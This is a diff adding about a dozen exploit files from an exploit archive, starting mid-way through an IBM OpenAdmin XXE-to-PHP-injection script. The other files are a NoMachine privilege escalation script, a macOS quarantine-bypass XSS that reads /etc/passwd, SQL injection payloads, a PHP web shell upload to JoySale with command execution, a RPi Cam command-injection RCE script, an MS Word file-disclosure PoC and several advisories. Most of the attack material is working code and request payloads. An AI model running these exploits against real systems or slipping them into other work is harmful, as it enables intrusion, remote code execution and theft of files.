    target = "http://127.0.0.1/openadmin/admin/index.php?act=admin&do=doconfig&LANG=en_US&BASEURL=http%3A%2F%2Flocalhost%3A80%2Fopenadmin&HOMEDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FApache_2.4.2%2Fhtdocs%2Fopenadmin%2F&CONNDBDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FOAT_conf%2F&HOMEPAGE=%7b%24%7beval%28%24_GET%5bc%5d%29%7d%7d&PINGINTERVAL=300&ROWSPERPAGE=25&SECURESQL=on&INFORMIXCONTIME=20&INFORMIXCONRETRY=3&dosaveconf=Save"
    p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [  <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
    f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
    r = requests.post("%s" % t, files=f)
    if r.status_code == 200:
        return True
    return False
 def main():
    print banner()
    if not check_args():
        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
        print "(+) eg: %s 192.168.1.172 192.168.1.1:1111" % sys.argv[0]
        sys.exit()
    if suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
        print "(+) PHP code injection done!"
        suntzu_omfg_no_one_can_audit_my_software_yo()
 if __name__ == '__main__':
    main()
 """
 Bonus bug SQL Injection!
 POST /openadmin/admin/index.php?act=admin&do=doimport HTTP/1.1
 Host: 192.168.1.172
 Connection: close
 Content-Type: multipart/form-data; boundary=--------1366435377
 Content-Length: 258
 ----------1366435377
 Content-Disposition: form-data; name="importfile"; filename="rektGOD.txt"
 Content-Type: text/plain
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <root><group name="rgay' or '1'=(select '1') -- "></group></root>
 ----------1366435377--
 """
--- a/platforms/osx/local/42460.py
+++ b/platforms/osx/local/42460.py
@ -0,0 +1,42 @@
 """
 # Exploit Title: NoMachine LPE - Local Privilege Escalation
 # Date:  09/08/2017
 # Exploit Author: Daniele Linguaglossa
 # Vendor Homepage: https://www.nomachine.com
 # Software Link: https://www.nomachine.com
 # Version: 5.3.9
 # Tested on: OSX
 # CVE : CVE-2017-12763
 NoMachine uses a file called nxexec in order to execute different action as super user, nxexec allow to execute
 sh files within a sandboxed path, additionally other checks such as parent process name, parent process path are
 performed in order to be sure only NoMachine application are allowed to execute nxexec.
 nxnode.bin allow to spoof a local path via NX_SYSTEM environment variable, this is use to craft a path where a perl
 file will be executed, this PoC exploit the NX_SYSTEM variable in order to allow a custom perl file to call nxexec
 and execute privileged nxcat.sh script in order to read any file on filesystem.
 """
 import os
 import sys
 print "[!] NoMachine - EoP - Read any file by @dzonerzy"
 if len(sys.argv) == 4:
    nxnode = sys.argv[1]
    nxexec = sys.argv[2]
    toread = sys.argv[3]
    user = os.environ.get("USER")
    tmp_path = "/tmp/lib/perl/nxnode"
    tmp_file = "/tmp/lib/perl/nxnode/nxnode.pl"
    tmp_file_content = "print \"[*] Exploiting vulnerability\\n\";" \
                       "system(\"{0} " \
                       "nxcat.sh 1 {1} 2 '../../../../../..{2}'\");".format(nxexec, user, toread)
    print "[*] Crafting tmp environment"
    os.system("mkdir -p {0}".format(tmp_path))
    with open(tmp_file,"w") as tmp:
        tmp.write(tmp_file_content)
        tmp.close()
    os.system("NX_SYSTEM=/tmp {0}".format(nxnode))
    os.unlink(tmp_file)
    os.system("rm -r /tmp/lib")
 else:
    print "Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0])
--- a/platforms/osx/local/42948.txt
+++ b/platforms/osx/local/42948.txt
@ -0,0 +1,178 @@
 Title:                 Mac OS X Local Javascript Quarantine Bypass
 Product:               Mac OS X
 Version:               10.12, 10.11, 10.10 and probably prior
 Vendor:                apple.com <http://apple.com/>
 Type:                  DOM Based XSS
 Risk level:            3 / 5
 Credits:               filippo.cavallarin@wearesegment.com <mailto:filippo.cavallarin@wearesegment.com>
 CVE:                   N/A
 Vendor notification:   2017-07-15
 Vendor fix:            2017-09-25
 Public disclosure:     2017-09-28
 DETAILS
 Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary
 Javascript code without restrictions. 
 Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files
 extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted 
 environment. For example, a quarantined html file won't be able to load local resources.
 The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the 
 excution of arbitrary javascript commands in its (unrestricted) context.
 The mentioned file is located at /System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
 and contains the following code:
 <script type="text/javascript" charset="utf-8">
 setBasePathFromString(urlParam("rhtml"));
 loadLocStrings();
 loadJavascriptLibs();
 function init () { /* <-- called by <body onload="init()" */
 [...]
 rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
 [...]
 self.contentHttpReq.open('GET', rHTMLPath, true);
 self.contentHttpReq.onreadystatechange = function() {
     if (self.contentHttpReq.readyState == 4) {
         loadTutorial(self.contentHttpReq.responseText);
     }
 }
 [...]
 }
 function loadTutorial(response) {
 var rHTMLPath = urlParam("rhtml");
 // this will create a tutorialData item
 eval(response);
 [...]
 }
 function loadLocStrings()
 {
 var headID = document.getElementsByTagName("head")[0];         
 var rHTMLPath = urlParam("rhtml");
 rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
 var newScript = document.createElement('script');
 newScript.type = 'text/javascript';
 newScript.src = rHTMLPath;
 headID.appendChild(newScript);      
 }
 [...]
 </script>
 In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates
 the response content as javascript code.
 The code below contains two different DOM Based XSS. 
 The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as
 its "src" property.
 The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the
 response directly to eval().
 As the result the same payload is executed twice.
 An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
 One possile vector of exploitation are the .webloc files. Basically those files contain an url and they simply loads
 it in Safari when opened. 
 By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on
 the victim's computer.
 Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar
 archive (or any other format that supports extended attributes).
 PROOF OF CONCEPT
 To reproduce the issue follow the steps below:
  1. create a javascript file you want to execute on your target
  2. convert its content to base64
  3. encode it to a "uri component" (ex with encodeURIComponent js function)
  4. use it to build a data uri as follow:
    data:text/plain;base64,<urlencoded base64>
  5. prepend the following string to it:
    file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>
  6. open it with Safari
  7. save it as a bookmark
  8. drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
  9. create a tar archive containing the .webloc file
 10. send it to the victim
 Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the
 javascript code must be: document.getElementsByTagName("base")[0].href="";
 The following bash script will take a javascript file and converts it to final "file" url:
 BOF
 #!/bin/bash
 BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>"
 BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
 DATAURI="data:text/plain;base64,"
 JSFILE=$1
 if [ "$JSFILE" = "" ]; then
 echo "usage: $0 <jsfile>"
 exit 1
 fi
 JS=$BASEJS`cat $JSFILE`"})();"
 ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
 URL="$BASEURL""$DATAURI""$ENCJS"
 echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
 EOF
 The following javascript code will alert the /etc/passwd file on the victim's computer:
 BOF
 xhr = new XMLHttpRequest();
 xhr.open("GET", "/etc/passwd", true);
 xhr.onreadystatechange = function(){
 if (xhr.readyState == 4) {
 alert(xhr.responseText);
 }
 };
 xhr.send();
 EOF
 Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this
 exploitation process it's not an issue since .webloc files are always opened with Safari.
 NOTE
 This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this
 bug in Apple's changelog. 
 No CVE has been assigned by Apple.
 SOLUTION
 Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html.
 Safari 11 (available for Mac OS X 10.11, 10.12 and 10.13) introduces the following security henancement:
 "CORS and cross origin access from file:// are now blocked unless Disable Local File Restrictions is selected from the Develop menu"
 hence the above exploit will not work against updated versions of OSX El Capitan and Sierra. However javascript execution outside quarantine is still possible.
 REFERENCES
 https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html <https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html>
 DISCLOSURE
 This vulnerability has been disclosed thru Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd <http://www.beyondsecurity.com/ssd>
--- a/platforms/php/webapps/42164.txt
+++ b/platforms/php/webapps/42164.txt
@ -0,0 +1,15 @@
 # Exploit Title: Nuevo mailer version <= 6.0 SQL Injection
 # Exploit Author: ALEH BOITSAU
 # Google Dork: inurl:/inc/rdr.php?
 # Date:  2017-06-09
 # Vendor Homepage:  https://www.nuevomailer.com/
 # Version: 6.0 and below
 # Tested on: Linux
 Vulnerable script: rdr.php
 Vulnerable parameter: r
 PoC:
 https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
 NB: vendor has been notified.
--- a/platforms/php/webapps/42317.txt
+++ b/platforms/php/webapps/42317.txt
@ -0,0 +1,17 @@
 # Exploit Title: Sabai Discuss Wordpress Plugin Stored XSS vulnerability
 # Exploit Author: Hesam Bazvand
 # Contact: https://www.facebook.com/hesam.king73
 # Software demo : https://sabaidiscuss.com/
 # Tested on: Windows 7 / Kali Linux
 # Category: WebApps
 # Dork : User Your Mind ! :D
 # Video Demo : https://youtu.be/QETN6cvBMoM
 # Email : Black.king066@gmail.com
 # Special thanks to Mr alireza ajami
 1- Create new question 
 	http://localhost/wordpress/questions/ask
 2- Insert XSS Code in Title Field
 3- Enjoy it!
--- a/platforms/php/webapps/42348.txt
+++ b/platforms/php/webapps/42348.txt
@ -0,0 +1,99 @@
 # Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
 # Date: July 7th, 2017
 # Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
 # Vendor Homepage: http://www.tildenetwork.com/
 # Version: Tilde CMS 1.0.1
 # Tested on: Ubuntu 12.04, PHP 5.3.10
 I. INTRODUCTION
 ========================================================================
 Tilde CMS is closed-source content management system created by 
 tildenetwork.com
 II. DESCRIPTION
 ========================================================================
 The web application suffers of multiple vulnerabilities.
 1. SQL Injection
 ------------------------------------------------------------------------
 Due to missing escaping of the backtick character, the following query in 
 the source code is vulnerable:
 [class.SystemAction.php]
 	$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
 	$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);
 The vulnerability can be trigged via a POST request as shown in the
 following PoC: 
 	POST /actionphp/action.input.php HTTP/1.1
 	ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE 
 	SLEEP(5)-- aaa &idForm=1234567890
 The resulting query on the server-side will be:
 	SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'
 For a succesful exploitation, the table "form_table_1" must be valid.
 2. Path Traversal
 ------------------------------------------------------------------------
 The vulnerabilty exists on this method:
 	GET /actionphp/download.File.php?&file=../../../../../../etc/passwd
 3. Arbitrary Files Upload
 ------------------------------------------------------------------------
 It is possible to bypass the implemented restrictions shown in the 
 following snippet of the code:
 	$file=$_FILES['file'.$i]['tmp_name'];
 	if (($file!="")&&($file!="none")) {
 		$source_file=$file;
 		$file_name=$_FILES['file'.$i]['name'];
 		$file_name=str_replace(".php",".txt",$file_name);
 		$file_name=str_replace(" ","_",$file_name);
 		$file_name=str_replace("+","",$file_name);
 A file named "filename.+php" will be renamed in "filename.php", therefore 
 successfully uploaded.
 4. Insecure Direct Object References
 ------------------------------------------------------------------------
 It is possible to retrieve sensitive resources by using direct references.
 A low privileged user can load the PHP resources such as: 
 	admin/content.php
 	admin/content.php?method=ftp_upload
 IV. BUSINESS IMPACT
 ========================================================================
 These flaws may compromise the integrity of the system and/or expose 
 sensitive information.
 V. SYSTEMS AFFECTED
 ========================================================================
 Tilde CMS 1.01 is vulnerable (probably all previous versions)
 VI. VULNERABILITY HISTORY
 ========================================================================
 July 6th, 2017: Vulnerability identification
 July 7th, 2017: Vendor notification
 July 13th, 2017: Vendor notification
 VII. LEGAL NOTICES
 ========================================================================
 The information contained within this advisory is supplied "as-is" with 
 no warranties or guarantees of fitness of use or otherwise. We accept no
 responsibility for any damage caused by the use or misuseof this 
 information.
--- a/platforms/php/webapps/42410.txt
+++ b/platforms/php/webapps/42410.txt
@ -0,0 +1,139 @@
 JoySale Arbitrary File Upload
 # Exploit Title: JoySale Arbitrary File Upload
 # Exploit Author: Mutlu Benmutlu
 # Date: 1/08/2017
 # Vendor Homepage: http://www.hitasoft.com/product/joysale-advanced-classifieds-script/
 # Version: Joysale v2.2.1 (latest)
 # Google Dork: "joysale-style.css"
 # Tested on : MacOS Sierra 10.12.5 / Kali Linux
 Details
 =======
 Vendor informed about vulnerability, they are going to release fix. Joysale v2.2.1 (latest version) vulnerable to attack.
 While uploading image file, you can change the content in it, there is only user controls for file type.
 After you post vulnerable code via file upload, server saves your file in temp folder
 ========================================
 Vulnerable Page:
 ========================================
 http://xxxxxxxxx.com/products/create 
 ========================================
 Vulnerable POST REQUEST:
 ========================================
 POST /item/products/upload/QZP83N70 HTTP/1.1
 Host: xxxxxxxxx.com
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 X-Requested-With: XMLHttpRequest
 Referer: https://xxxxxxxxx.com/products/create
 Content-Length: 2054
 Content-Type: multipart/form-data; boundary=---------------------------1321235123106179646780168
 Cookie: PHPSESSID=b6ah8xxxxxxx9k4pqvr4; useridval=user%40mailaddress.com
 Connection: close
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="XUploadForm[file]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[category]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[subCategory]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[name]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[description]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[price]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[currency]"
 â‚¬-EUR
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[location]"
 28108 Alcobendas, Spain
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[latitude]"
 40.534915100000006
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[longitude]"
 -3.616368599999987
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="facebook_share"
 1
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[promotion][type]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[promotion][addtype]"
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="Products[uploadSessionId]"
 QZP83N70
 -----------------------------1321235045961106179646780168
 Content-Disposition: form-data; name="XUploadForm[file]"; filename="ab.php"
 Content-Type: image/png
 <?php echo shell_exec($_GET[‘e’]); ?>
 -----------------------------1321235045961106179646780168--
 ========================================
 Vulnerable POST RESPONSE:
 ========================================
 HTTP/1.1 200 OK
 Server: nginx
 Date: Mon, 31 Jul 2017 13:50:18 GMT
 Content-Type: application/json
 Connection: close
 X-Powered-By: PHP/7.0.21
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Vary: Accept
 X-Powered-By: Linux
 MS-Author-Via: DAV
 Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
 Content-Length: 306
 [{"name”:”ab.php","type":"image\/png","size": 306,"url":"\/media\/item\/tmp\/f99aaeasde51c890402b0fda9408.php","thumbnail_url":"\/media\/item\/tmp\/\/f99aaeasde51c890402b0fda9408.php","delete_url":"\/products\/upload?_method=delete&file= f99aaeasde51c890402b0fda9408.php","delete_type":"POST"}]
 ========================================
 Vulnerable UPLOADED FILE PATH
 ========================================
 http://xxxxxxxxx.com/media/item/tmp/f99aaeasde51c890402b0fda9408.php
 ========================================
 Vulnerable Code Execution (example)
 ========================================
 http://xxxxxxxxx.com/media/item/tmp/f99aaeasde51c890402b0fda9408.php?e=cat+/etc/passwd
 Enjoy.
 Mutlu Benmutlu
--- a/platforms/php/webapps/42452.py
+++ b/platforms/php/webapps/42452.py
@ -0,0 +1,65 @@
 #####
 # RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
 #
 # A web interface for the RPi Cam
 # Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
 #
 # Date 16/08/2017
 # Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
 #
 # http://www.korznikov.com
 #
 # RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
 #
 #
 # Local File Read (get /etc/passwd file):
 # ----------------
 # POST /preview.php HTTP/1.1
 # Host: 127.0.0.1
 # Content-Type: application/x-www-form-urlencoded
 # Connection: close
 # Content-Length: 80
 #
 # download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
 #
 #
 # Blind Command Injection:
 # ------------------
 # POST /preview.php HTTP/1.1
 # Host: 127.0.0.1
 # Content-Type: application/x-www-form-urlencoded
 # Connection: close
 # Content-Length: 52
 #
 # convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
 #
 #
 # Blind Command Injection can be used with Local File Read to properly get the output of injected command.
 #
 # Proof of concept:
 #####
 #!/usr/bin/python
 import requests
 import sys
 if not len(sys.argv[2:]):
   print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
   exit(1)
 def GET(target, rfile):
   res = requests.post("http://%s/preview.php" % target,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
        data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
   return res.content
 def RCE(target, command):
   requests.post("http://%s/preview.php" % target,
        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
        data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
   return GET(target,'/tmp/output.txt')
 target = sys.argv[1]
 command = sys.argv[2]
 print RCE(target,command)
--- a/platforms/php/webapps/42516.txt
+++ b/platforms/php/webapps/42516.txt
@ -0,0 +1,30 @@
 # # # # #
 # Exploit Title: iTech Movie Script 7.51 - SQL Injection
 # Dork: N/A
 # Date: 18.08.2017
 # Vendor Homepage : http://itechscripts.com/
 # Software Link: http://itechscripts.com/movie-portal-script/
 # Demo: http://movie-portal.itechscripts.com/
 # Version: 7.51
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an attacker to inject sql commands....
 #
 # Proof of Concept:
 # 
 # http://localhost/[PATH]/movie.php?f=[SQL]
 # -9+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x2833429)--+-
 # 
 # http://localhost/[PATH]/show_misc_video.php?id=[SQL]
 # 
 # http://localhost/[PATH]/tvshow.php?s=[SQL]
 #
 # Etc...
 # # # # #
--- a/platforms/php/webapps/42577.txt
+++ b/platforms/php/webapps/42577.txt
@ -0,0 +1,34 @@
 # Exploit Title: CMS Web-Gooroo <=1.141 - Multiple Vulnerabilities
 # Date: 01-06-2017
 # Exploit Author: Kaimi
 # Website: https://kaimi.io
 # Vendor Homepage: http://web.archive.org/web/20120510194357/http://www.web-gooroo.com/
 # Software Link: https://github.com/andrey-buligin/hanna/tree/master/wbg
 # Version: <=1.141
 # Category: webapps
 1. SQL Injection
 File: /wbg/core/_includes/authorization.inc.php
 Vulnerable code:
 $SQL_query = 'SELECT * FROM wbg_users WHERE (login=\'' . $_POST['wbg_login'] . '\') AND (password=\'' . md5(md5($_POST['wbg_password'])) . '\')';
 $USER = mysql_fetch_assoc(mysql_query($SQL_query));
 2. Hardcoded admin user
 File: /wbg/core/_includes/authorization.inc.php
 Vulnerable code:
 if ((md5($_POST['wbg_login']) == '2d626704807d4c5be1b46e85c4070fec') && (md5($_POST['wbg_password']) == '2967a371178d713d3898957dd44786af')) {
 	$USER = $this->get_megaadmin();
 }
 2d626704807d4c5be1b46e85c4070fec - mayhem
 2967a371178d713d3898957dd44786af - no success in bruteforce, though...
 3. Full path disclosure
 Almost any file, because of lack of input validation and overall bad design.
 CMS log file (besides DB log) location with full path and debug info:
 /wbg/tmp/logs/syslog.log.php
 4. Unrestricted file upload
 Can be done via admin panel as attachment to any publication. No file type checking is performed.
--- a/platforms/php/webapps/42595.txt
+++ b/platforms/php/webapps/42595.txt
@ -0,0 +1,23 @@
 # Exploit Title: PHP-SecureArea <= v2.7 - SQL Injection
 # Date: 30-08-2017
 # Exploit Author: Cryo
 # Contact: https://twitter.com/KernelEquinox
 # Vendor Homepage: https://www.withinweb.com
 # Software Link: https://www.withinweb.com/phpsecurearea/
 # Version: 2.7 and below
 # Tested on: Windows, Linux, Mac OS X
 1. Description
 ==============
 PHP-SecureArea is vulnerable to SQL injection due to lack of input sanitization in the misc.php file.
 2. Proof of Concept
 ===================
 POST /phpsecurearea/ipn/process.php HTTP/1.1
 Host: localhost
 Content-Type: application/x-www-form-urlencoded
 item_number=-1' UNION ALL SELECT 1-- -
--- a/platforms/windows/local/42930.txt
+++ b/platforms/windows/local/42930.txt
@ -0,0 +1,132 @@
 Title: MS Office Word Information Disclosure Vulnerability
 Date: September 30th, 2017.
 Author: Eduardo Braun Prado
 Vendor Homepage: http://www.microsoft.com/
 Software Link: https://products.office.com/
 Version: 2007  32-bits (x86)
 Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
 CVE: N/A
 Description:
 MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
 The "Microsoft Scriptlet Component" ActiveX.
 Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
 allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
 This issue facilitates attacks against the IE rendering engine because some enhanced security features
 are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
 back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
 relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
 disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..
 The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
 Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
 that applied the updates directory:
 c:\users\%username%\AppData\Local\Microsoft\Windows
 Instructions:
 a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
 b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
 (Could be the home directory too, however nowadays most browsers by default will save the file to the
 'Downloads' folder.
 c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
 can pick up any file as long as you know the full path.
 Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
 the web, which is appended by several programs to files downloaded from the web.
 -------------Disclose_File.WPS------------------------------------------------------------
 <html><body>
 <!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
 the file name you wish -->
 <object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
 <param name=url value="Disclose_File.wps">
 </object>
 <script language=javascript>
 var loc = document.location.href.toLowerCase();
 var locNoProtocol = loc.substring(8,loc.length);
 var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
 var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);
 var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);
 var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);
 var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced
 // through the default "C$" share.
 var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
 // change the above path to match another file you wish to grab the contents.
 var t = loc.indexOf("c:");   // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
 var tr = loc.indexOf("c$");
 if (t != -1)
 {
 var ns = loc.substring(t+2,loc.length);
 document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
 }
 else if (tr != -1)
 {
 var x = new ActiveXObject("Microsoft.XMLHTTP");
 x.Open("GET",fileToDisclose,0);
 x.Send();
 fileContents = x.ResponseText;
 alert(fileContents);
 }
 </script>
 </body>
 </html>
 -------------------------------------------------------------------------------------------------------------------
 Vulnerable: MS Office 2007
 MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
 is able to somehow bypass it, the vulnerability will surely affect the latest versions.
 Tested on: Any Windows version that suppors Office 2007.
 Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
--- a/platforms/windows/remote/42891.txt
+++ b/platforms/windows/remote/42891.txt
@ -0,0 +1,89 @@
 [+] Credits: John Page (aka hyp3rlinx)	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
 [+] ISR: ApparitionSec            
 Vendor:
 ==================
 www.trendmicro.com
 Product:
 ========
 OfficeScan
 v11.0 and XG (12.0)*
 OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
 An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
 manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
 web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
 Vulnerability Type:
 ===================
 Man-in-the-Middle (MITM) Remote Code Execution
 CVE Reference:
 ==============
 CVE-2017-14084
 Security Issue:
 ===============
 MITM vector exists as the CURL request used by Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set to false.
 CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine.
 CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to...
 References:
 ===========
 https://success.trendmicro.com/solution/1118372
 Vulnerable code snippet...
 curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
 curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
 curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
 curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);  <===================  HERE
 curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);  <==================== THERE
 Network Access:
 ===============
 Remote
 Severity:
 =========
 High
 Disclosure Timeline:
 =================================
 Vendor Notification: May 31, 2017
 Vendor releases fixes / advisory : September 27, 2017
 September 28, 2017 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx